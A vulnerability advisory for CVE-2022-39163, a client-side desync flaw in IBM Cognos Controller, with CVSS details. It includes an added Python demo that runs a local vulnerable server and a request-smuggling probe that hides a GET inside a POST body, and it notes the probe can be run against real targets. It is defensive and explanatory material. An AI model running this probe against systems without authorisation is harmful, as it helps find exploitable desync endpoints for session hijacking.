Client-Side Desync Vulnerability in IBM Cognos Controller
CVE-2022-39163

4.7 MEDIUM

Key Information:

Vendor:
IBM
CVE Published:
26 March 2025

What is CVE-2022-39163?

IBM Cognos Controller versions 11.0.0 through 11.1.0 are vulnerable to a client-side desync (CSD) attack. In a CSD attack, a web page controlled by the attacker causes the victim's browser to send a request whose body the server answers without consuming; the unread bytes stay on the browser's keep-alive connection and are parsed as the start of the next request the browser sends, so the attacker ends up controlling a request that carries the victim's cookies and session. According to IBM, an attacker could use the desynchronized connection to perform cross-site scripting (XSS), manipulating the user's session or injecting malicious script, and thereby expose sensitive user data and compromise application integrity. The CVSS metrics (network attack vector, high attack complexity, no privileges, user interaction required, scope changed) reflect that the victim must visit an attacker-controlled page and that the impact lands in the victim's browser session rather than on the server alone.
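The following is an added example, not code from IBM, the advisory, or Cognos Controller. It shows, on a constructed local server, the server-side condition a client-side desync relies on (a POST answered without its body being read) and the two-request probe commonly used to detect it: the body of the first request is itself a complete GET, and the response to the "second" request reveals whether the server consumed the body. The paths /ignore, /ok, /smuggled and /probe and the "path=" echo are assumptions made for the demo and say nothing about Cognos Controller's real endpoints. The real attack is launched from attacker JavaScript in the victim's browser; this example only reproduces what the server does with the unread body.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class DemoHandler(BaseHTTPRequestHandler):
    """Constructed demo server (not Cognos Controller).
    POST /ignore answers without consuming its body (desync-prone);
    POST /ok drains the body first (correct). GET echoes the request path."""
    protocol_version = "HTTP/1.1"   # keep-alive: requests share one connection

    def log_message(self, *args):   # keep the demo quiet
        pass

    def _reply(self, text):
        body = text.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._reply("path=" + self.path)

    def do_POST(self):
        if self.path == "/ok":
            # Correct behaviour: consume the declared body before answering.
            self.rfile.read(int(self.headers.get("Content-Length", "0")))
        # For /ignore the body stays on the socket; the server's keep-alive
        # loop will parse it as the start of the next request (the desync).
        self._reply("posted " + self.path)


def start_server():
    """Start the demo server on a free loopback port in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), DemoHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def read_response(f):
    """Read one HTTP/1.1 response with a Content-Length body from file f."""
    status = f.readline().decode().strip()
    length = 0
    while True:
        line = f.readline()
        if line in (b"\r\n", b"\n", b""):
            break
        name, _, value = line.decode().partition(":")
        if name.strip().lower() == "content-length":
            length = int(value.strip())
    return status, f.read(length)


def probe(port, path):
    """CSD detection probe: POST to `path` with a body that is itself a GET,
    then send a normal GET on the same connection. Returns the path echoed in
    the second response: '/probe' if the POST body was consumed, '/smuggled'
    if it was left on the wire and parsed as a new request."""
    smuggled = b"GET /smuggled HTTP/1.1\r\nHost: localhost\r\n\r\n"
    post = (f"POST {path} HTTP/1.1\r\nHost: localhost\r\n"
            f"Content-Type: text/plain\r\n"
            f"Content-Length: {len(smuggled)}\r\n\r\n").encode() + smuggled
    follow_up = b"GET /probe HTTP/1.1\r\nHost: localhost\r\n\r\n"
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        f = s.makefile("rb")
        s.sendall(post)
        read_response(f)              # response to the POST itself
        s.sendall(follow_up)
        _, body = read_response(f)    # which request does this answer?
        return body.decode().split("=", 1)[1]


if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    for path in ("/ok", "/ignore"):
        print(path, "->", probe(port, path))
    srv.shutdown()
```

Against a real target the same probe is run over a TLS connection to the origin, and a result of "/smuggled" (or a response to a request the client never sent) indicates an endpoint that can be abused from a victim's browser.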

Affected Version(s)

IBM Cognos Controller 11.0.0 through 11.0.1

IBM Cognos Controller 11.1.0


CVSS V3.1

Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
Score:
4.7
Severity:
MEDIUM
Confidentiality:
Low
Integrity:
Low
Availability:
None
Attack Vector:
Network
Attack Complexity:
High
Privileges Required:
None
User Interaction:
Required
Scope:
Changed
